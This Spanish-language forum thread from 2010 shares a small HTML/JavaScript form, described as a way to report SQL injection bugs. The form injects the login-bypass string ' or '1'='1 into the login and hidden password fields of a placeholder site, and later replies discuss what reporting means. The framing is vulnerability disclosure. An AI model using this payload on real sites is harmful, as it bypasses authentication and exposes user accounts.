Reportar inyecciones SQL

Foro de elhacker.net

Seguridad Informática

Hacking

Bugs y Exploits

Reportar inyecciones SQL

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: Reportar inyecciones SQL (Leído 4,121 veces)

SnakingMax

Desconectado

Mensajes: 167

Reportar inyecciones SQL

« en: 5 Octubre 2010, 23:19 pm »

Os dejo un código muy sencillo en html+javascript que he utilizado para reportar inyecciones sql. Sin tener conocimientos de informática a cualquiera que se le haga el reporte puede comprobar la vulnerabilidad.

Código

<script language="javascript">
 
function enviar()
{
document.getElementById('valor1').value = "' or '1'='1"+document.getElementById('valor1').value;
return true;
}
 
</script>
 
Acceder al primer usuario cuyo LOGIN sea:
 
<form method="post" action="http://www.laweb.com/accion" onsubmit="enviar();">
<input name="login" id="valor1" type="text">
<input name="password" value="' or '1'='1" id="valor2" type="hidden">
<input value="Enviar" type="submit">
 
</form>


« Última modificación: 5 Octubre 2010, 23:36 pm por SnakingMax »	En línea

Shell Root

Moderador Global

Desconectado

Mensajes: 3.724

Re: Reportar inyecciones SQL

« Respuesta #1 en: 5 Octubre 2010, 23:29 pm »

...


	En línea

Te vendería mi talento por poder dormir tranquilo.

xassiz~

Desconectado

Mensajes: 457

Re: Reportar inyecciones SQL

« Respuesta #2 en: 5 Octubre 2010, 23:30 pm »

Cita de: Shell Root en 5 Octubre 2010, 23:29 pm

...


	En línea

#ka0labs
#byte-inside
#twitter

SnakingMax

Desconectado

Mensajes: 167

Re: Reportar inyecciones SQL

« Respuesta #3 en: 5 Octubre 2010, 23:38 pm »

Me había olvidado cambiar la inyección que tenía por ' or '1' = '1 y también desocultar un campo que tenía de tipo password. En la inyección en la que lo utilicé el campo password se modifica así que no se puede inyectar ahí.

Saludos


	En línea

Shell Root

Moderador Global

Desconectado

Mensajes: 3.724

Re: Reportar inyecciones SQL

« Respuesta #4 en: 5 Octubre 2010, 23:50 pm »

@SnakingMax, para vos que es reportar?


	En línea

Te vendería mi talento por poder dormir tranquilo.

SnakingMax

Desconectado

Mensajes: 167

Re: Reportar inyecciones SQL

« Respuesta #5 en: 6 Octubre 2010, 00:05 am »

Cita de: Shell Root en 5 Octubre 2010, 23:50 pm

@SnakingMax, para vos que es reportar?

Pues para mi reportar es informar de algo (dar un reporte), y en este caso el reporte es una prueba del concepto.
Y si quieres adjuntas también info sobre como se corrige la vulnerabilidad desde la BD o desde el propio código PHP filtrando los caracteres que no se desean.

También podría haber puesto como título del post lanzador de inyecciones sql, pero le veo mejor utilidad al código como reporte en un correo electrónico.

Si me equivoco corrígeme, estoy en el foro para aprender y para aportar en lo que pueda


« Última modificación: 6 Octubre 2010, 00:14 am por SnakingMax »	En línea

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Reportar los mensajes de uno mismo al moderador. « 1 2 » Sugerencias y dudas sobre el Foro	79137913	10	6,689	14 Junio 2012, 19:57 pm por Randomize
	[Sugerencia] Poder reportar Topics propios (por razones obvias) Sugerencias y dudas sobre el Foro	z3nth10n	3	3,453	17 Agosto 2013, 00:21 am por ivancea96
	Inyecciones en inyecciones SQL Nivel Web	MichBukana	1	2,767	6 Octubre 2013, 00:08 am por Stakewinner00
	Reportar una vulnerabilidad Hacking	Reck0n	7	7,064	2 Noviembre 2017, 02:19 am por Ancasu
	Repórtar una pagina fraudelenta Foro Libre	gabo1234	3	2,001	22 Noviembre 2018, 15:00 pm por Machacador